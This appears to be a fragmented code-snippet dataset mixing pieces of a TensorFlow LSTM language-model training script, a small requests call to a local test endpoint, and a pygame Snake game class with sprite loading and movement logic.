lstm_gradients = filter(lambda x: -1 < x.op.name.find(\"lstm\"), all_gradients) non_lstm_gradients = set(all_gradients).difference(lstm_gradients) lstm_gradients,", "* hparams.sequence_length, 8192), initializer=tf.zeros_initializer, trainable=False) state_h = tf.get_variable(name=\"state_h\", shape=(hparams.batch_size * hparams.sequence_length, 1024), initializer=tf.zeros_initializer,", ":param hparams: :return: \"\"\" trainable_vars = tf.trainable_variables() tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=\"\") 
tf.global_variables() all_gradients = tf.gradients(loss,", "cell_out, cell_state = _attach_cached_lstm_nodes(cell_out, hparams=hparams) cell_state_all_layers.append(cell_state) cell_out_all_layers.append(cell_out) lstm_outputs = tf.reshape(cell_out, shape=(-1, hparams.word_embedding_size)) with", "= non_lstm_gradients.union(lstm_gradients) optimizer = tf.train.AdagradOptimizer(hparams.learning_rate) global_step = tf.Variable(0, name='global_step', trainable=False) train_op = optimizer.apply_gradients(zip(all_gradients,", "logits, softmax def _attach_log_perplexity_nodes(logits, targets, target_weights, hparams=None): \"\"\" :param logits: :param targets: :param", "2).upper() + \"_diag\", } for r_match, r_replace in var_map_regexes.items(): matching_variables = filter(lambda x:", "pull out the most likely words :param logits: :param id_to_word_lookup_table: :param k: :param", "char_embedding_nodes.attach_char_embedding_nodes(input_seqs, num_shards=NUM_SHARDS, hparams=hparams) word_embeddings = tf.reshape(word_embeddings, (-1, hparams.word_embedding_size)) cell_out = word_embeddings cell_state_all_layers =" ]
[ "-*- coding: utf-8 -*- from requests import post r = post(url='http://127.0.0.1:5000/testsuit',data={'userId':'Robert'}) print(r.status_code) print(r.json())", "# -*- coding: utf-8 -*- from requests import post r = post(url='http://127.0.0.1:5000/testsuit',data={'userId':'Robert'}) print(r.status_code)", "<reponame>simulency/Robot_Executor_Demo # -*- coding: utf-8 -*- from requests import post r = post(url='http://127.0.0.1:5000/testsuit',data={'userId':'Robert'})" ]
[ "move_snake(self) -> None: if Saw.get_cutted() == False or len(self.body) < (abs(CUTTING)+1): if self.new_block", "== 0: self.pyScreen.blit(self.head,block_rect) elif index == len(self.body) - 1: self.pyScreen.blit(self.tail,block_rect) else: previous_block =", "previous_block.x == 1 and next_block.y == -1 or previous_block.y == -1 and next_block.x", "#Snake.is_moving = True self.direction = vec def add_block(self) -> None: self.new_block = True", "len(self.body) < (abs(CUTTING)+1): if self.new_block == True: body_copy = self.body[:] body_copy.insert(0, body_copy[0] +", "pygame.Surface) -> None: self.load_snake_texture() self.body = [Vector2(5,10),Vector2(4,10),Vector2(3,10)] self.pyScreen = screen self.direction = Vector2(1,0)", "= self.head_right elif head_relation == Vector2(0,-1): self.head = self.head_up elif head_relation == Vector2(0,1):", "== True: body_copy = self.body[:] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] if", "self.head_down = pygame.image.load('assets/Schlange/Schlange_Kopf_unten.png') # Schwanz self.tail_up = pygame.image.load('assets/Schlange/Schlange_Schwanz_oben.png') self.tail_down = pygame.image.load('assets/Schlange/Schlange_Schwanz_unten.png') self.tail_right =", "self.new_block = False self.slowed = False def draw_snake_object(self) -> None: for index, block", "self.head_left elif head_relation == Vector2(1,0): self.head = self.head_right elif head_relation == Vector2(0,-1): self.head", "[Vector2(5,10),Vector2(4,10),Vector2(3,10)] self.pyScreen = screen self.direction = Vector2(1,0) self.new_block = False self.slowed = False", "if self.new_block == True: body_copy = self.body[:] body_copy.insert(0, body_copy[0] + self.direction) self.body =", "next_block.x: self.pyScreen.blit(self.body_vertical, block_rect) elif previous_block.y == next_block.y: self.pyScreen.blit(self.body_horizontal, block_rect) else: if previous_block.x ==", "elif previous_block.x == -1 and next_block.y == 1 or previous_block.y == 1 
and", "self.direction) self.body = body_copy[:] else: self.new_block = False body_copy = self.body[:CUTTING] body_copy.insert(0, body_copy[0]", "self.pyScreen.blit(self.body_bl, block_rect) elif previous_block.x == 1 and next_block.y == -1 or previous_block.y ==", "screen: pygame.Surface) -> None: self.load_snake_texture() self.body = [Vector2(5,10),Vector2(4,10),Vector2(3,10)] self.pyScreen = screen self.direction =", "sys import time from pygame.math import Vector2 from .config import FPS, xSize, ySize,", "draw_snake(self) -> None: # Update Snake-Model self.update_head_graphics() self.update_tail_graphics() self.draw_snake_object() def update_tail_graphics(self) -> pygame.Surface:", "Snake-Model self.update_head_graphics() self.update_tail_graphics() self.draw_snake_object() def update_tail_graphics(self) -> pygame.Surface: tail_relation = self.body[-2] - self.body[-1]", "self.pyScreen.blit(self.body_br, block_rect) def draw_snake(self) -> None: # Update Snake-Model self.update_head_graphics() self.update_tail_graphics() self.draw_snake_object() def", "None: for index, block in enumerate(self.body): # rect for positioning x_pos = int(block.x", "== 1 or previous_block.y == 1 and next_block.x == -1: self.pyScreen.blit(self.body_bl, block_rect) elif", "tail_relation = self.body[-2] - self.body[-1] if tail_relation == Vector2(-1,0): self.tail = self.tail_left elif", "== False or len(self.body) < (abs(CUTTING)+1): if self.new_block == True: body_copy = self.body[:]", "and next_block.y == 1 or previous_block.y == 1 and next_block.x == -1: self.pyScreen.blit(self.body_bl,", "+ self.direction) self.body = body_copy[:] Saw.cutting_done() Snake.is_moving = False def set_direction(self, vec) ->", "self.direction = vec def add_block(self) -> None: self.new_block = True def load_snake_texture(self) ->", "else: Cake.remove_cake() self.new_block = False else: self.new_block = False else: body_copy = self.body[:-1]", "= self.body[:CUTTING] body_copy.insert(0, body_copy[0] + 
self.direction) self.body = body_copy[:] Saw.cutting_done() Snake.is_moving = False", "if Saw.get_cutted() == False or len(self.body) < (abs(CUTTING)+1): if self.new_block == True: body_copy", "< (abs(CUTTING)+1): if self.new_block == True: body_copy = self.body[:] body_copy.insert(0, body_copy[0] + self.direction)", "self.body = body_copy[:] else: self.new_block = False body_copy = self.body[:CUTTING] body_copy.insert(0, body_copy[0] +", "CUTTING from .eatable.saw import Saw from .eatable.cake import Cake class Snake(object): is_moving =", "index == 0: self.pyScreen.blit(self.head,block_rect) elif index == len(self.body) - 1: self.pyScreen.blit(self.tail,block_rect) else: previous_block", "block next_block = self.body[index - 1] - block if previous_block.x == next_block.x: self.pyScreen.blit(self.body_vertical,", "from .config import FPS, xSize, ySize, cell_size, cell_number, CUTTING from .eatable.saw import Saw", "and next_block.x == 1: self.pyScreen.blit(self.body_br, block_rect) def draw_snake(self) -> None: # Update Snake-Model", "# Update Snake-Model self.update_head_graphics() self.update_tail_graphics() self.draw_snake_object() def update_tail_graphics(self) -> pygame.Surface: tail_relation = self.body[-2]", "- self.body[0] if head_relation == Vector2(-1,0): self.head = self.head_left elif head_relation == Vector2(1,0):", "update_tail_graphics(self) -> pygame.Surface: tail_relation = self.body[-2] - self.body[-1] if tail_relation == Vector2(-1,0): self.tail", "Vector2(1,0): self.tail = self.tail_right elif tail_relation == Vector2(0,-1): self.tail = self.tail_up elif tail_relation", "body_copy[:] Saw.cutting_done() Snake.is_moving = False def set_direction(self, vec) -> pygame.Surface: #Snake.is_moving = True", "def move_snake(self) -> None: if Saw.get_cutted() == False or len(self.body) < (abs(CUTTING)+1): if", "False def draw_snake_object(self) -> None: for index, block in enumerate(self.body): # rect for", "if index == 0: 
self.pyScreen.blit(self.head,block_rect) elif index == len(self.body) - 1: self.pyScreen.blit(self.tail,block_rect) else:", "self.head_up = pygame.image.load('assets/Schlange/Schlange_Kopf_oben.png') self.head_right = pygame.image.load('assets/Schlange/Schlange_Kopf_rechts.png') self.head_left = pygame.image.load('assets/Schlange/Schlange_Kopf_links.png') self.head_down = pygame.image.load('assets/Schlange/Schlange_Kopf_unten.png') #", "self.body_vertical = pygame.image.load('assets/Schlange/Schlange_vertikal.png') self.body_horizontal = pygame.image.load('assets/Schlange/Schlange_horizontal.png') # Directions self.body_tr = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_oben.png') self.body_tl =", "for positioning x_pos = int(block.x * cell_size) y_pos = int(block.y * cell_size) block_rect", "block_rect) elif previous_block.x == 1 and next_block.y == 1 or previous_block.y == 1", "body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] Saw.cutting_done() Snake.is_moving = False def set_direction(self,", "cell_size) y_pos = int(block.y * cell_size) block_rect = pygame.Rect(x_pos, y_pos, cell_size, cell_size) #", "== Vector2(-1,0): self.tail = self.tail_left elif tail_relation == Vector2(1,0): self.tail = self.tail_right elif", "next_block.x == 1: self.pyScreen.blit(self.body_br, block_rect) def draw_snake(self) -> None: # Update Snake-Model self.update_head_graphics()", "self.pyScreen.blit(self.tail,block_rect) else: previous_block = self.body[index + 1] - block next_block = self.body[index -", "-1: self.pyScreen.blit(self.body_bl, block_rect) elif previous_block.x == 1 and next_block.y == -1 or previous_block.y", "Snake.is_moving = False def set_direction(self, vec) -> pygame.Surface: #Snake.is_moving = True self.direction =", "= vec def add_block(self) -> None: self.new_block = True def load_snake_texture(self) -> pygame.Surface:", "cell_number, CUTTING from .eatable.saw import Saw from .eatable.cake import Cake class Snake(object): 
is_moving", "1 or previous_block.y == 1 and next_block.x == -1: self.pyScreen.blit(self.body_bl, block_rect) elif previous_block.x", "= self.tail_down def update_head_graphics(self) -> pygame.Surface: head_relation = self.body[1] - self.body[0] if head_relation", "self.tail = self.tail_up elif tail_relation == Vector2(0,1): self.tail = self.tail_down def update_head_graphics(self) ->", "== Vector2(0,1): self.tail = self.tail_down def update_head_graphics(self) -> pygame.Surface: head_relation = self.body[1] -", "== next_block.x: self.pyScreen.blit(self.body_vertical, block_rect) elif previous_block.y == next_block.y: self.pyScreen.blit(self.body_horizontal, block_rect) else: if previous_block.x", "tail_relation == Vector2(0,-1): self.tail = self.tail_up elif tail_relation == Vector2(0,1): self.tail = self.tail_down", "= False def set_direction(self, vec) -> pygame.Surface: #Snake.is_moving = True self.direction = vec", "xSize, ySize, cell_size, cell_number, CUTTING from .eatable.saw import Saw from .eatable.cake import Cake", "Vector2(-1,0): self.tail = self.tail_left elif tail_relation == Vector2(1,0): self.tail = self.tail_right elif tail_relation", "False body_copy = self.body[:CUTTING] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] Saw.cutting_done() Snake.is_moving", "body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] if Cake.eated_the_cake(): if Cake.get_cake_countdown() != 0:", "self.new_block = False body_copy = self.body[:CUTTING] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:]", "and next_block.x == 1: self.pyScreen.blit(self.body_tr, block_rect) elif previous_block.x == 1 and next_block.y ==", "or previous_block.y == -1 and next_block.x == 1: self.pyScreen.blit(self.body_tr, block_rect) elif previous_block.x ==", "def set_direction(self, vec) -> pygame.Surface: #Snake.is_moving = True self.direction = vec def add_block(self)", "1: self.pyScreen.blit(self.body_br, 
block_rect) def draw_snake(self) -> None: # Update Snake-Model self.update_head_graphics() self.update_tail_graphics() self.draw_snake_object()", "False def set_direction(self, vec) -> pygame.Surface: #Snake.is_moving = True self.direction = vec def", "0: self.pyScreen.blit(self.head,block_rect) elif index == len(self.body) - 1: self.pyScreen.blit(self.tail,block_rect) else: previous_block = self.body[index", "cell_size, cell_number, CUTTING from .eatable.saw import Saw from .eatable.cake import Cake class Snake(object):", "or previous_block.y == 1 and next_block.x == 1: self.pyScreen.blit(self.body_br, block_rect) def draw_snake(self) ->", "previous_block.y == next_block.y: self.pyScreen.blit(self.body_horizontal, block_rect) else: if previous_block.x == -1 and next_block.y ==", "None: # Update Snake-Model self.update_head_graphics() self.update_tail_graphics() self.draw_snake_object() def update_tail_graphics(self) -> pygame.Surface: tail_relation =", "time from pygame.math import Vector2 from .config import FPS, xSize, ySize, cell_size, cell_number,", "def update_tail_graphics(self) -> pygame.Surface: tail_relation = self.body[-2] - self.body[-1] if tail_relation == Vector2(-1,0):", "next_block.x == -1: self.pyScreen.blit(self.body_tl, block_rect) elif previous_block.x == -1 and next_block.y == 1", "self.head_up elif head_relation == Vector2(0,1): self.head = self.head_down def move_snake(self) -> None: if", "Cake.get_cake_countdown() != 0: Cake.decrase_cake_countdown() else: Cake.remove_cake() self.new_block = False else: self.new_block = False", "Vector2(0,-1): self.tail = self.tail_up elif tail_relation == Vector2(0,1): self.tail = self.tail_down def update_head_graphics(self)", "pygame, sys import time from pygame.math import Vector2 from .config import FPS, xSize,", "self.direction = Vector2(1,0) self.new_block = False self.slowed = False def draw_snake_object(self) -> None:", "from pygame.math import Vector2 from .config import FPS, xSize, ySize, 
cell_size, cell_number, CUTTING", "from .eatable.cake import Cake class Snake(object): is_moving = False def __init__(self, screen: pygame.Surface)", "head_relation == Vector2(1,0): self.head = self.head_right elif head_relation == Vector2(0,-1): self.head = self.head_up", "elif tail_relation == Vector2(0,-1): self.tail = self.tail_up elif tail_relation == Vector2(0,1): self.tail =", "self.body[:-1] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] else: self.new_block = False body_copy", "False or len(self.body) < (abs(CUTTING)+1): if self.new_block == True: body_copy = self.body[:] body_copy.insert(0,", "1 and next_block.y == -1 or previous_block.y == -1 and next_block.x == 1:", "body_copy[:] if Cake.eated_the_cake(): if Cake.get_cake_countdown() != 0: Cake.decrase_cake_countdown() else: Cake.remove_cake() self.new_block = False", "block if previous_block.x == next_block.x: self.pyScreen.blit(self.body_vertical, block_rect) elif previous_block.y == next_block.y: self.pyScreen.blit(self.body_horizontal, block_rect)", "screen self.direction = Vector2(1,0) self.new_block = False self.slowed = False def draw_snake_object(self) ->", "= pygame.image.load('assets/Schlange/Schlange_Schwanz_unten.png') self.tail_right = pygame.image.load('assets/Schlange/Schlange_Schwanz_rechts.png') self.tail_left = pygame.image.load('assets/Schlange/Schlange_Schwanz_links.png') # Körper self.body_vertical = pygame.image.load('assets/Schlange/Schlange_vertikal.png')", "block_rect = pygame.Rect(x_pos, y_pos, cell_size, cell_size) # what direction is tha face if", "import FPS, xSize, ySize, cell_size, cell_number, CUTTING from .eatable.saw import Saw from .eatable.cake", "pygame.image.load('assets/Schlange/Schlange_horizontal.png') # Directions self.body_tr = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_oben.png') self.body_tl = pygame.image.load('assets/Schlange/Schlange_Ecke_links_oben.png') self.body_br = 
pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_unten.png') self.body_bl", "Cake class Snake(object): is_moving = False def __init__(self, screen: pygame.Surface) -> None: self.load_snake_texture()", "Vector2(1,0) self.new_block = False self.slowed = False def draw_snake_object(self) -> None: for index,", "if Cake.get_cake_countdown() != 0: Cake.decrase_cake_countdown() else: Cake.remove_cake() self.new_block = False else: self.new_block =", "0: Cake.decrase_cake_countdown() else: Cake.remove_cake() self.new_block = False else: self.new_block = False else: body_copy", "-1 and next_block.y == 1 or previous_block.y == 1 and next_block.x == -1:", "body_copy[0] + self.direction) self.body = body_copy[:] Saw.cutting_done() Snake.is_moving = False def set_direction(self, vec)", "elif previous_block.y == next_block.y: self.pyScreen.blit(self.body_horizontal, block_rect) else: if previous_block.x == -1 and next_block.y", "pygame.Surface: head_relation = self.body[1] - self.body[0] if head_relation == Vector2(-1,0): self.head = self.head_left", "Cake.decrase_cake_countdown() else: Cake.remove_cake() self.new_block = False else: self.new_block = False else: body_copy =", "-1 or previous_block.y == -1 and next_block.x == 1: self.pyScreen.blit(self.body_tr, block_rect) elif previous_block.x", "previous_block.x == -1 and next_block.y == -1 or previous_block.y == -1 and next_block.x", "self.body[0] if head_relation == Vector2(-1,0): self.head = self.head_left elif head_relation == Vector2(1,0): self.head", "index, block in enumerate(self.body): # rect for positioning x_pos = int(block.x * cell_size)", "cell_size, cell_size) # what direction is tha face if index == 0: self.pyScreen.blit(self.head,block_rect)", "-> None: self.load_snake_texture() self.body = [Vector2(5,10),Vector2(4,10),Vector2(3,10)] self.pyScreen = screen self.direction = Vector2(1,0) self.new_block", "next_block.y == -1 or previous_block.y == -1 and next_block.x == -1: self.pyScreen.blit(self.body_tl, 
block_rect)", "Vector2(0,-1): self.head = self.head_up elif head_relation == Vector2(0,1): self.head = self.head_down def move_snake(self)", "-> None: if Saw.get_cutted() == False or len(self.body) < (abs(CUTTING)+1): if self.new_block ==", "None: self.load_snake_texture() self.body = [Vector2(5,10),Vector2(4,10),Vector2(3,10)] self.pyScreen = screen self.direction = Vector2(1,0) self.new_block =", "self.load_snake_texture() self.body = [Vector2(5,10),Vector2(4,10),Vector2(3,10)] self.pyScreen = screen self.direction = Vector2(1,0) self.new_block = False", "pygame.image.load('assets/Schlange/Schlange_Kopf_oben.png') self.head_right = pygame.image.load('assets/Schlange/Schlange_Kopf_rechts.png') self.head_left = pygame.image.load('assets/Schlange/Schlange_Kopf_links.png') self.head_down = pygame.image.load('assets/Schlange/Schlange_Kopf_unten.png') # Schwanz self.tail_up", "* cell_size) y_pos = int(block.y * cell_size) block_rect = pygame.Rect(x_pos, y_pos, cell_size, cell_size)", "class Snake(object): is_moving = False def __init__(self, screen: pygame.Surface) -> None: self.load_snake_texture() self.body", "previous_block.x == next_block.x: self.pyScreen.blit(self.body_vertical, block_rect) elif previous_block.y == next_block.y: self.pyScreen.blit(self.body_horizontal, block_rect) else: if", "= self.body[1] - self.body[0] if head_relation == Vector2(-1,0): self.head = self.head_left elif head_relation", "== 1 or previous_block.y == 1 and next_block.x == 1: self.pyScreen.blit(self.body_br, block_rect) def", "Vector2(0,1): self.head = self.head_down def move_snake(self) -> None: if Saw.get_cutted() == False or", "= False body_copy = self.body[:CUTTING] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] Saw.cutting_done()", "= [Vector2(5,10),Vector2(4,10),Vector2(3,10)] self.pyScreen = screen self.direction = Vector2(1,0) self.new_block = False self.slowed =", "or previous_block.y == -1 and next_block.x == -1: self.pyScreen.blit(self.body_tl, 
block_rect) elif previous_block.x ==", "body_copy = self.body[:-1] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] else: self.new_block =", "self.tail_down = pygame.image.load('assets/Schlange/Schlange_Schwanz_unten.png') self.tail_right = pygame.image.load('assets/Schlange/Schlange_Schwanz_rechts.png') self.tail_left = pygame.image.load('assets/Schlange/Schlange_Schwanz_links.png') # Körper self.body_vertical =", "len(self.body) - 1: self.pyScreen.blit(self.tail,block_rect) else: previous_block = self.body[index + 1] - block next_block", "= False else: body_copy = self.body[:-1] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:]", "self.tail = self.tail_down def update_head_graphics(self) -> pygame.Surface: head_relation = self.body[1] - self.body[0] if", "== Vector2(-1,0): self.head = self.head_left elif head_relation == Vector2(1,0): self.head = self.head_right elif", "== Vector2(0,-1): self.tail = self.tail_up elif tail_relation == Vector2(0,1): self.tail = self.tail_down def", "== next_block.y: self.pyScreen.blit(self.body_horizontal, block_rect) else: if previous_block.x == -1 and next_block.y == -1", "Vector2 from .config import FPS, xSize, ySize, cell_size, cell_number, CUTTING from .eatable.saw import", "= pygame.image.load('assets/Schlange/Schlange_Kopf_links.png') self.head_down = pygame.image.load('assets/Schlange/Schlange_Kopf_unten.png') # Schwanz self.tail_up = pygame.image.load('assets/Schlange/Schlange_Schwanz_oben.png') self.tail_down = pygame.image.load('assets/Schlange/Schlange_Schwanz_unten.png')", "# Kopf self.head_up = pygame.image.load('assets/Schlange/Schlange_Kopf_oben.png') self.head_right = pygame.image.load('assets/Schlange/Schlange_Kopf_rechts.png') self.head_left = pygame.image.load('assets/Schlange/Schlange_Kopf_links.png') self.head_down =", "== 1: self.pyScreen.blit(self.body_br, block_rect) def draw_snake(self) -> None: # Update Snake-Model self.update_head_graphics() 
self.update_tail_graphics()", "None: if Saw.get_cutted() == False or len(self.body) < (abs(CUTTING)+1): if self.new_block == True:", "= Vector2(1,0) self.new_block = False self.slowed = False def draw_snake_object(self) -> None: for", "= int(block.x * cell_size) y_pos = int(block.y * cell_size) block_rect = pygame.Rect(x_pos, y_pos,", "pygame.Surface: # Kopf self.head_up = pygame.image.load('assets/Schlange/Schlange_Kopf_oben.png') self.head_right = pygame.image.load('assets/Schlange/Schlange_Kopf_rechts.png') self.head_left = pygame.image.load('assets/Schlange/Schlange_Kopf_links.png') self.head_down", "self.draw_snake_object() def update_tail_graphics(self) -> pygame.Surface: tail_relation = self.body[-2] - self.body[-1] if tail_relation ==", "-> pygame.Surface: #Snake.is_moving = True self.direction = vec def add_block(self) -> None: self.new_block", "-> pygame.Surface: tail_relation = self.body[-2] - self.body[-1] if tail_relation == Vector2(-1,0): self.tail =", "draw_snake_object(self) -> None: for index, block in enumerate(self.body): # rect for positioning x_pos", "self.tail_up = pygame.image.load('assets/Schlange/Schlange_Schwanz_oben.png') self.tail_down = pygame.image.load('assets/Schlange/Schlange_Schwanz_unten.png') self.tail_right = pygame.image.load('assets/Schlange/Schlange_Schwanz_rechts.png') self.tail_left = pygame.image.load('assets/Schlange/Schlange_Schwanz_links.png') #", "elif index == len(self.body) - 1: self.pyScreen.blit(self.tail,block_rect) else: previous_block = self.body[index + 1]", "pygame.image.load('assets/Schlange/Schlange_Schwanz_unten.png') self.tail_right = pygame.image.load('assets/Schlange/Schlange_Schwanz_rechts.png') self.tail_left = pygame.image.load('assets/Schlange/Schlange_Schwanz_links.png') # Körper self.body_vertical = pygame.image.load('assets/Schlange/Schlange_vertikal.png') self.body_horizontal", "pygame.image.load('assets/Schlange/Schlange_Schwanz_rechts.png') self.tail_left = 
pygame.image.load('assets/Schlange/Schlange_Schwanz_links.png') # Körper self.body_vertical = pygame.image.load('assets/Schlange/Schlange_vertikal.png') self.body_horizontal = pygame.image.load('assets/Schlange/Schlange_horizontal.png') #", "1 and next_block.x == 1: self.pyScreen.blit(self.body_br, block_rect) def draw_snake(self) -> None: # Update", "import Cake class Snake(object): is_moving = False def __init__(self, screen: pygame.Surface) -> None:", "-1 and next_block.x == 1: self.pyScreen.blit(self.body_tr, block_rect) elif previous_block.x == 1 and next_block.y", "self.pyScreen = screen self.direction = Vector2(1,0) self.new_block = False self.slowed = False def", "Vector2(-1,0): self.head = self.head_left elif head_relation == Vector2(1,0): self.head = self.head_right elif head_relation", "vec) -> pygame.Surface: #Snake.is_moving = True self.direction = vec def add_block(self) -> None:", "ySize, cell_size, cell_number, CUTTING from .eatable.saw import Saw from .eatable.cake import Cake class", "else: self.new_block = False body_copy = self.body[:CUTTING] body_copy.insert(0, body_copy[0] + self.direction) self.body =", "= self.body[index - 1] - block if previous_block.x == next_block.x: self.pyScreen.blit(self.body_vertical, block_rect) elif", "self.tail_right elif tail_relation == Vector2(0,-1): self.tail = self.tail_up elif tail_relation == Vector2(0,1): self.tail", "if Cake.eated_the_cake(): if Cake.get_cake_countdown() != 0: Cake.decrase_cake_countdown() else: Cake.remove_cake() self.new_block = False else:", "self.body[:CUTTING] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] Saw.cutting_done() Snake.is_moving = False def", "if tail_relation == Vector2(-1,0): self.tail = self.tail_left elif tail_relation == Vector2(1,0): self.tail =", "body_copy[:] else: self.new_block = False body_copy = self.body[:CUTTING] body_copy.insert(0, body_copy[0] + self.direction) self.body", "self.body[index - 1] - block if previous_block.x == 
next_block.x: self.pyScreen.blit(self.body_vertical, block_rect) elif previous_block.y", "= int(block.y * cell_size) block_rect = pygame.Rect(x_pos, y_pos, cell_size, cell_size) # what direction", "head_relation == Vector2(-1,0): self.head = self.head_left elif head_relation == Vector2(1,0): self.head = self.head_right", "= self.head_down def move_snake(self) -> None: if Saw.get_cutted() == False or len(self.body) <", "cell_size) # what direction is tha face if index == 0: self.pyScreen.blit(self.head,block_rect) elif", "= self.head_left elif head_relation == Vector2(1,0): self.head = self.head_right elif head_relation == Vector2(0,-1):", "self.head = self.head_up elif head_relation == Vector2(0,1): self.head = self.head_down def move_snake(self) ->", "== -1 and next_block.x == -1: self.pyScreen.blit(self.body_tl, block_rect) elif previous_block.x == -1 and", "elif head_relation == Vector2(1,0): self.head = self.head_right elif head_relation == Vector2(0,-1): self.head =", "y_pos, cell_size, cell_size) # what direction is tha face if index == 0:", "index == len(self.body) - 1: self.pyScreen.blit(self.tail,block_rect) else: previous_block = self.body[index + 1] -", "self.tail_left = pygame.image.load('assets/Schlange/Schlange_Schwanz_links.png') # Körper self.body_vertical = pygame.image.load('assets/Schlange/Schlange_vertikal.png') self.body_horizontal = pygame.image.load('assets/Schlange/Schlange_horizontal.png') # Directions", "Saw.cutting_done() Snake.is_moving = False def set_direction(self, vec) -> pygame.Surface: #Snake.is_moving = True self.direction", "Kopf self.head_up = pygame.image.load('assets/Schlange/Schlange_Kopf_oben.png') self.head_right = pygame.image.load('assets/Schlange/Schlange_Kopf_rechts.png') self.head_left = pygame.image.load('assets/Schlange/Schlange_Kopf_links.png') self.head_down = pygame.image.load('assets/Schlange/Schlange_Kopf_unten.png')", "elif tail_relation == Vector2(1,0): self.tail = self.tail_right elif tail_relation == 
Vector2(0,-1): self.tail =", "pygame.math import Vector2 from .config import FPS, xSize, ySize, cell_size, cell_number, CUTTING from", "== -1: self.pyScreen.blit(self.body_tl, block_rect) elif previous_block.x == -1 and next_block.y == 1 or", "-> None: # Update Snake-Model self.update_head_graphics() self.update_tail_graphics() self.draw_snake_object() def update_tail_graphics(self) -> pygame.Surface: tail_relation", "what direction is tha face if index == 0: self.pyScreen.blit(self.head,block_rect) elif index ==", "import time from pygame.math import Vector2 from .config import FPS, xSize, ySize, cell_size,", "self.new_block = False else: body_copy = self.body[:-1] body_copy.insert(0, body_copy[0] + self.direction) self.body =", "pygame.image.load('assets/Schlange/Schlange_Kopf_rechts.png') self.head_left = pygame.image.load('assets/Schlange/Schlange_Kopf_links.png') self.head_down = pygame.image.load('assets/Schlange/Schlange_Kopf_unten.png') # Schwanz self.tail_up = pygame.image.load('assets/Schlange/Schlange_Schwanz_oben.png') self.tail_down", "x_pos = int(block.x * cell_size) y_pos = int(block.y * cell_size) block_rect = pygame.Rect(x_pos,", "= pygame.image.load('assets/Schlange/Schlange_horizontal.png') # Directions self.body_tr = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_oben.png') self.body_tl = pygame.image.load('assets/Schlange/Schlange_Ecke_links_oben.png') self.body_br = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_unten.png')", "previous_block.y == -1 and next_block.x == 1: self.pyScreen.blit(self.body_tr, block_rect) elif previous_block.x == 1", "self.tail_up elif tail_relation == Vector2(0,1): self.tail = self.tail_down def update_head_graphics(self) -> pygame.Surface: head_relation", "True def load_snake_texture(self) -> pygame.Surface: # Kopf self.head_up = pygame.image.load('assets/Schlange/Schlange_Kopf_oben.png') self.head_right = pygame.image.load('assets/Schlange/Schlange_Kopf_rechts.png')", "+ self.direction) 
self.body = body_copy[:] else: self.new_block = False body_copy = self.body[:CUTTING] body_copy.insert(0,", "= False self.slowed = False def draw_snake_object(self) -> None: for index, block in", "pygame.Rect(x_pos, y_pos, cell_size, cell_size) # what direction is tha face if index ==", "in enumerate(self.body): # rect for positioning x_pos = int(block.x * cell_size) y_pos =", "-1 or previous_block.y == -1 and next_block.x == -1: self.pyScreen.blit(self.body_tl, block_rect) elif previous_block.x", "1 and next_block.x == -1: self.pyScreen.blit(self.body_bl, block_rect) elif previous_block.x == 1 and next_block.y", "body_copy = self.body[:CUTTING] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] Saw.cutting_done() Snake.is_moving =", "next_block = self.body[index - 1] - block if previous_block.x == next_block.x: self.pyScreen.blit(self.body_vertical, block_rect)", "def draw_snake_object(self) -> None: for index, block in enumerate(self.body): # rect for positioning", "positioning x_pos = int(block.x * cell_size) y_pos = int(block.y * cell_size) block_rect =", "1 and next_block.y == 1 or previous_block.y == 1 and next_block.x == 1:", "int(block.x * cell_size) y_pos = int(block.y * cell_size) block_rect = pygame.Rect(x_pos, y_pos, cell_size,", "Directions self.body_tr = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_oben.png') self.body_tl = pygame.image.load('assets/Schlange/Schlange_Ecke_links_oben.png') self.body_br = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_unten.png') self.body_bl = pygame.image.load('assets/Schlange/Schlange_Ecke_links_unten.png')", "import pygame, sys import time from pygame.math import Vector2 from .config import FPS,", "previous_block.y == 1 and next_block.x == -1: self.pyScreen.blit(self.body_bl, block_rect) elif previous_block.x == 1", "== 1 and next_block.y == -1 or previous_block.y == -1 and next_block.x ==", "== 1 and next_block.y == 1 or previous_block.y == 1 and next_block.x ==", "= 
pygame.image.load('assets/Schlange/Schlange_Kopf_oben.png') self.head_right = pygame.image.load('assets/Schlange/Schlange_Kopf_rechts.png') self.head_left = pygame.image.load('assets/Schlange/Schlange_Kopf_links.png') self.head_down = pygame.image.load('assets/Schlange/Schlange_Kopf_unten.png') # Schwanz", "= body_copy[:] if Cake.eated_the_cake(): if Cake.get_cake_countdown() != 0: Cake.decrase_cake_countdown() else: Cake.remove_cake() self.new_block =", "tail_relation == Vector2(-1,0): self.tail = self.tail_left elif tail_relation == Vector2(1,0): self.tail = self.tail_right", "and next_block.y == 1 or previous_block.y == 1 and next_block.x == 1: self.pyScreen.blit(self.body_br,", "pygame.image.load('assets/Schlange/Schlange_Schwanz_oben.png') self.tail_down = pygame.image.load('assets/Schlange/Schlange_Schwanz_unten.png') self.tail_right = pygame.image.load('assets/Schlange/Schlange_Schwanz_rechts.png') self.tail_left = pygame.image.load('assets/Schlange/Schlange_Schwanz_links.png') # Körper self.body_vertical", "-1 and next_block.y == -1 or previous_block.y == -1 and next_block.x == -1:", "and next_block.x == -1: self.pyScreen.blit(self.body_tl, block_rect) elif previous_block.x == -1 and next_block.y ==", "1] - block next_block = self.body[index - 1] - block if previous_block.x ==", "Cake.remove_cake() self.new_block = False else: self.new_block = False else: body_copy = self.body[:-1] body_copy.insert(0,", "self.direction) self.body = body_copy[:] if 